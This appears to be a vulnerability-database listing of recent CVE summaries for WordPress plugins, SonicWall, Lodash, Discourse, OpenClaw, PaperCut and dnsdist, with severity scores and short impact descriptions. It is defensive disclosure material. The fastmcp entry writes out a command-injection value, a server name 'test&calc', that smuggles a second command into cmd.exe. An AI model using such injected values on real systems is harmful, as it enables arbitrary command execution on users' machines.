Unauthenticated Server-Side Request Forgery (SSRF) in Performance Monitor WordPress plugin through version 1.0.6 allows remote attackers to perform arbitrary HTTP requests by exploiting insufficient parameter validation. The vulnerability enables attackers without authentication to interact with internal network resources and services accessible from the WordPress server, potentially leading to information disclosure, lateral movement, or interaction with backend systems.
WordPress
SSRF
-
CVE-2026-3468
MEDIUM
CVSS 4.8
Stored Cross-Site Scripting (XSS) in SonicWall Email Security allows authenticated admin users to inject and execute arbitrary JavaScript code through improper input sanitization during web page generation. The vulnerability affects all versions of SonicWall Email Security appliance and requires admin-level authentication to exploit, limiting immediate exposure but posing significant risk to organizations where admin accounts are compromised or insider threats exist.
Sonicwall
XSS
-
CVE-2026-3191
MEDIUM
CVSS 5.4
The Minify HTML WordPress plugin (versions up to 2.1.12) contains a Cross-Site Request Forgery (CSRF) vulnerability in the 'minify_html_menu_options' function due to missing nonce validation, allowing unauthenticated attackers to modify plugin settings if a site administrator is tricked into clicking a malicious link. The attack requires user interaction (UI:R) but can degrade site availability or integrity by altering minification behavior. No public exploit code or active exploitation has been confirmed, though the vulnerability is tracked by CISA-recognized security researchers.
WordPress
CSRF
-
CVE-2026-3139
MEDIUM
CVSS 4.3
User Profile Builder plugin for WordPress up to version 3.15.5 allows authenticated subscribers and above to reassign ownership of arbitrary posts and attachments through insecure direct object reference (IDOR) in the wppb_save_avatar_value() function. The vulnerability lacks validation on user-controlled keys, enabling privilege escalation where low-privileged users can modify post_author fields to take control of content created by other users. No public exploit code or active exploitation has been identified at time of analysis.
WordPress
Authentication Bypass
-
CVE-2026-2950
MEDIUM
CVSS 6.5
Prototype pollution in Lodash 4.17.23 and earlier allows unauthenticated remote attackers to delete properties from built-in prototypes (Object.prototype, Number.prototype, String.prototype) via array-wrapped path segments in _.unset and _.omit functions, bypassing the incomplete fix for CVE-2025-13465. The vulnerability has a CVSS score of 6.5 with low integrity and availability impact; no public exploit code or active exploitation has been confirmed at time of analysis.
Prototype Pollution
Authentication Bypass
-
CVE-2026-2480
MEDIUM
CVSS 6.4
Stored cross-site scripting (XSS) in WP Shortcodes Plugin - Shortcodes Ultimate through version 7.4.10 allows authenticated contributors and above to inject arbitrary JavaScript via the 'max_width' attribute of the su_box shortcode due to insufficient input sanitization and output escaping. The injected scripts persist in page content and execute for all users viewing the affected page, enabling attackers with contributor-level WordPress access to compromise site visitors without additional user interaction.
WordPress
XSS
-
CVE-2026-1877
MEDIUM
CVSS 6.1
Cross-site request forgery in Auto Post Scheduler WordPress plugin versions up to 1.84 allows unauthenticated attackers to modify plugin settings and inject malicious scripts by tricking site administrators into clicking a malicious link, due to missing nonce validation in the aps_options_page function. The vulnerability combines CSRF with stored XSS capability, affecting any WordPress site running the vulnerable plugin. CVSS 6.1 reflects the requirement for user interaction and the limited direct impact, though the ability to inject web scripts poses a meaningful risk to site integrity and user security.
WordPress
CSRF
XSS
-
CVE-2026-1834
MEDIUM
CVSS 6.4
Stored cross-site scripting in Ibtana - WordPress Website Builder plugin up to version 1.2.5.7 allows authenticated contributors to inject arbitrary JavaScript via the 'ive' shortcode due to insufficient input sanitization and output escaping. When an injected page is accessed by any user, the malicious script executes in their browser with the privileges of their WordPress session, enabling session hijacking, credential theft, or administrative actions depending on victim privileges. No public exploit code or active exploitation has been confirmed at the time of analysis.
WordPress
XSS
-
CVE-2026-1797
MEDIUM
CVSS 5.3
Unauthenticated attackers can directly access view PHP files in the Truebooker WordPress plugin (versions up to 1.1.4) to disclose sensitive information, such as user data or system configuration details exposed in those templates. The vulnerability requires only network access and no authentication, making it trivially exploitable via simple HTTP requests to exposed PHP files. No public exploit code or active exploitation has been confirmed at this time.
WordPress
Information Disclosure
Authentication Bypass
PHP
-
CVE-2026-1710
MEDIUM
CVSS 6.5
Unauthenticated attackers can modify WooPayments plugin settings through a missing capability check in the 'save_upe_appearance_ajax' AJAX function, affecting all versions up to and including 10.5.1. This allows remote attackers to alter payment appearance configurations without authentication, potentially disrupting payment processing or customer experience. No public exploit code or active exploitation has been identified at time of analysis.
WordPress
Authentication Bypass
-
CVE-2025-64340
MEDIUM
CVSS 6.7
Command injection in fastmcp install allows Windows users to execute arbitrary commands via shell metacharacters in server names. When installing a server with a name containing characters like `&` (e.g., `fastmcp install claude-code` with server name `test&calc`), the metacharacter is interpreted by cmd.exe during execution of .cmd wrapper scripts, leading to arbitrary command execution with user privileges. This affects Windows systems running claude or gemini CLI installations; macOS and Linux are unaffected. A patch is available via GitHub PR #3522.
Python
Command Injection
Apple
Microsoft
-
CVE-2025-62184
MEDIUM
CVSS 4.8
Stored cross-site scripting (XSS) in Pega Platform versions 8.1.0 through 25.1.0 allows authenticated administrative users with extensive access rights to inject malicious scripts into user interface components, potentially compromising the confidentiality of other users who interact with affected UI elements. The vulnerability requires high-privilege administrative access and user interaction to exploit, resulting in a CVSS 4.8 (low severity) with no integrity or availability impact. No public exploit code or active exploitation has been identified at time of analysis.
XSS
-
CVE-2025-41357
MEDIUM
CVSS 5.1
Reflected Cross-Site Scripting (XSS) in Anon Proxy Server v0.104 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser via a malicious URL targeting the 'host' parameter of the /diagdns.php endpoint. An attacker can exploit this to steal session cookies, perform unauthorized actions, or redirect users to malicious content. No public exploit code or active exploitation has been confirmed at time of analysis.
XSS
PHP
-
CVE-2025-41356
MEDIUM
CVSS 5.1
Reflected XSS in Anon Proxy Server v0.104 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser via a malicious URL targeting the 'host' parameter in /diagconnect.php, potentially enabling session hijacking or unauthorized user actions. The vulnerability requires user interaction (clicking a malicious link) and has a CVSS score of 5.1 (medium severity). No public exploit code or active exploitation has been confirmed at the time of analysis.
XSS
PHP
-
CVE-2025-41355
MEDIUM
CVSS 5.1
Reflected Cross-Site Scripting (XSS) in Anon Proxy Server v0.104 allows unauthenticated remote attackers to execute arbitrary JavaScript in victim browsers via malicious URLs targeting the 'port' and 'proxyPort' parameters in the /anon.php endpoint. Successful exploitation enables theft of session cookies and unauthorized actions on behalf of the victim. No public exploit code or active exploitation has been confirmed at time of analysis.
XSS
PHP
-
CVE-2026-34509
LOW
CVSS 2.3
Authorization bypass in OpenClaw's Microsoft Teams plugin allows unauthenticated remote attackers to circumvent sender allowlists and trigger replies in restricted Teams routes. Affecting OpenClaw versions before 2026.3.8, the flaw manifests when team/channel route allowlists contain empty groupAllowFrom parameters, causing the message handler to synthesize wildcard sender authorization instead of enforcing intended restrictions. No public exploit identified at time of analysis, though CVSS 7.5 reflects network-accessible exploitation with low complexity requiring no authentication. Vendor-released patch available in version 2026.3.8 with upstream commit 88aee916.
Authentication Bypass
Microsoft
-
CVE-2026-34506
LOW
CVSS 2.3
Authorization bypass in OpenClaw Microsoft Teams plugin (versions before 2026.3.8) permits unauthenticated attackers to circumvent sender allowlists when team/channel routes are configured with empty groupAllowFrom parameters. Remote attackers can exploit this network-accessible flaw with low complexity to trigger unauthorized message replies and access sensitive information in allowlisted Teams routes. EPSS and KEV data not available for this recent CVE; no public exploit identified at time of analysis.
Microsoft
Authentication Bypass
-
CVE-2026-34203
LOW
CVSS 2.7
Nautobot REST API user creation and modification endpoints bypass Django's configured password validation rules, allowing authenticated administrators to set or modify user passwords that fail to meet organizational security standards. Versions prior to 2.4.30 and 3.0.10 are affected; an authenticated admin with high privileges can create accounts with weak passwords despite configured AUTH_PASSWORD_VALIDATORS rules. CVSS score is 2.7 (low severity) due to requirement for authenticated administrative access; however, organizations with strict password policies relying on Nautobot's config-driven enforcement face integrity risk.
Python
Brute Force
Information Disclosure
-
CVE-2026-33073
LOW
CVSS 2.0
Discourse versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0 leak Stripe API keys across sites in multisite cluster deployments due to improper credential isolation in the discourse-subscriptions plugin, allowing authenticated users with UI access on one site to view payment credentials belonging to other sites within the same cluster. CVSS 2.0 reflects low severity (information disclosure only, requires authentication and user interaction), but the exposure of payment processor credentials carries material business risk. Patches are available in versions 2026.1.3, 2026.2.2, and 2026.3.0.
Information Disclosure
-
CVE-2026-32970
LOW
CVSS 2.0
OpenClaw before version 2026.3.11 allows local authenticated users to bypass local authentication boundaries through a credential fallback vulnerability where unavailable local gateway.auth.token and gateway.auth.password SecretRefs are incorrectly treated as unset, enabling fallback to remote credentials in local-only mode. The vulnerability requires local access and specific misconfiguration of auth references but can result in information disclosure if an attacker selects incorrect credential sources via CLI and helper paths. No public exploit code or active exploitation has been identified.
Authentication Bypass
-
CVE-2026-32607
LOW
CVSS 2.1
Stored cross-site scripting (XSS) in Discourse assignment UI allows authenticated users with assign permission to inject arbitrary HTML/JavaScript into user and group display names when the hidden prioritize_full_name_in_ux site setting is enabled, affecting versions 2026.1.0–2026.1.2, 2026.2.0–2026.2.1, and 2026.3.0. The injected payload executes in the browser of any user viewing an affected topic, enabling session hijacking, credential theft, or malware distribution. No active exploitation has been confirmed. The requirement for console access to enable the vulnerable setting, together with the assign permission needed to exploit it, limits real-world impact; the low CVSS score (2.1) reflects these constraints rather than the severity of the XSS itself.
XSS
-
CVE-2026-5115
LOW
CVSS 3.6
PaperCut NG/MF embedded application on Konica Minolta multifunction devices transmits sensitive session data over an insecure communication channel, enabling session hijacking and potential credential theft or phishing attacks against end users. The vulnerability affects all versions of the embedded application and was discovered internally by PaperCut; no public exploit code or active exploitation has been confirmed at this time.
Information Disclosure
-
CVE-2026-4794
LOW
CVSS 2.1
Stored cross-site scripting (XSS) vulnerabilities in PaperCut NG/MF versions before 25.0.10 allow authenticated administrator users to inject malicious scripts via multiple UI fields, potentially compromising other administrators' sessions and enabling unauthorized actions within the administrator context. The vulnerability requires valid administrator credentials and an active login session to exploit, limiting exposure to trusted administrative users but creating significant insider risk.
XSS
-
CVE-2026-3470
LOW
CVSS 3.8
Database corruption in SonicWall Email Security appliance via improper input sanitization allows authenticated admin users to corrupt the application database by submitting crafted input. The vulnerability requires valid administrative credentials and affects all versions of SonicWall Email Security as indicated by the CPE wildcard matching. No CVSS scoring, public exploit code, or CISA KEV status is available at this time, limiting precise risk quantification.
Sonicwall
Information Disclosure
-
CVE-2026-3469
LOW
CVSS 2.7
SonicWall Email Security appliance becomes unresponsive due to improper input validation when an authenticated administrator submits malformed input, causing a denial of service. The vulnerability affects all versions of SonicWall Email Security and requires valid admin credentials to exploit. While CVSS scoring is unavailable, the attack vector is remote and authenticated, limiting exposure to insider threats or compromised admin accounts.
Sonicwall
Information Disclosure
-
CVE-2026-0397
LOW
CVSS 3.1
Cross-Origin Resource Sharing (CORS) misconfiguration in PowerDNS dnsdist's internal webserver allows remote attackers to extract sensitive configuration information from the dashboard through a social engineering attack targeting authenticated administrators. An attacker can trick an admin into visiting a malicious website, which then leverages the misconfigured CORS policy to read dashboard API responses containing running configuration details. The vulnerability requires the internal webserver to be enabled (disabled by default) and user interaction, resulting in limited confidentiality impact with no integrity or availability risk.
Cors Misconfiguration
Information Disclosure
-
CVE-2026-0396
LOW
CVSS 3.1
HTML injection in DNSdist internal web dashboard allows remote unauthenticated attackers to inject malicious content via crafted DNS queries when domain-based dynamic rules are enabled, requiring user interaction to exploit. This affects all DNSdist versions with vulnerable rule functionality and carries low integrity impact with no confidentiality or availability consequences.
XSS